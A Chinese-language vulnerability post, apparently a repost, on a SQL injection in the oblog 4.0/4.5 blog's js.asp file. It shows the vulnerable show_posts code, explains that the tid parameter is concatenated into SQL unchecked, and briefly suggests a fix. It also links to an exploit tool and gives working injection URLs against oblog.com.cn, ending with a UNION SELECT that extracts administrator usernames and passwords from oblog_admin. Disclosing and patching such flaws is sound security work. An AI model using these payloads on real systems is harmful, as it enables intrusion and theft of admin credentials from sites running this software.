这里还有一个工具: oblog 4.0&4.5漏洞利用工具:http://www.7747.net/Soft/200704/6153.html
来源:Deepen Study
Neeao:经测试漏洞确实存在,请广大使用此Blog的朋友们小心了!
漏洞文件:js.asp
<%
Dim oblog
set oblog=new class_sys
oblog.autoupdate=False
oblog.start
dim js_blogurl,n
js_blogurl=Trim(oblog.CacheConfig(3))
n=CInt(Request("n"))
if n=0 then n=1
select case CInt(Request("j"))
case 1
call tongji()
case 2
call topuser()
case 3
call adduser()
case 4
call listclass()
case 5
call showusertype()
case 6
call listbestblog()
case 7
call showlogin()
case 8
call showplace()
case 9
call showphoto()
case 10
call showblogstars()
Case 11
Call show_hotblog()
Case 12
Call show_teams()
Case 13
Call show_posts()
Case 14
Call show_hottag()
case 0
call showlog()
end select
****************省略部分代码******************
Sub show_posts()
Dim teamid,postnum,l,u,t
teamid=Request("tid")
postnum=n
l=CInt(Request("l"))
u=CInt(Request("u"))
t=CInt(Request("t"))
Dim rs,sql,sRet,sAddon
Sql="select Top " & postnum & " teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 "
If teamid<>"" And teamid<>"0" Then
teamid=Replace(teamid,"|",",")
Sql=Sql & " And teamid In (" & teamid & ") "
End If
Sql=Sql & " Order by postid Desc"
Set rs=oblog.Execute(Sql)
sRet=" "
Do While Not rs.Eof
sAddon=""
* sRet=sRet & " " & oblog.Filt_html(Left(rs(2),l)) & ""
If u=1 Then sAddon=rs(4)
if t=1 Then
If sAddon<>"" Then sAddon=sAddon & ","
sAddon=sAddon & rs(3)
End If
If sAddon<>"" Then sAddon="(" & sAddon & ")"
sRet=sRet & sAddon & " "
rs.Movenext
Loop
Set rs = Nothing
sRet=sRet & " "
Response.write oblog.htm2js (sRet,True)
End Sub
问题根源:teamid 直接取自 Request("tid"),除了把 | 换成 , 之外没有做任何校验就拼进了 SQL,而同一文件里的 n、j、l、u、t 都先经过了 CInt 转换;修复时应在拼接前把 teamid 按 , 拆开并逐项用 CInt 转换(或只允许数字和逗号),而不是原样拼接。
调用show_posts()过程时,参数必须满足上面的条件 n=1,j=13
注入点:(" & teamid & ")
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=1 返回正常
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=2 返回异常
猜管理员表名
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 查询语句 and (1=1
Sql="select Top " & postnum & " teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 "
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=2 union select 1,2,3,4,5,6 from oblog_admin where id=(1
document.write(' * ');
gid=1跟pid=2里的1,2就是了,直接把里面的1,2替换为username,password
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=2 union select username,password,3,4,5,6 from oblog_admin where id=(1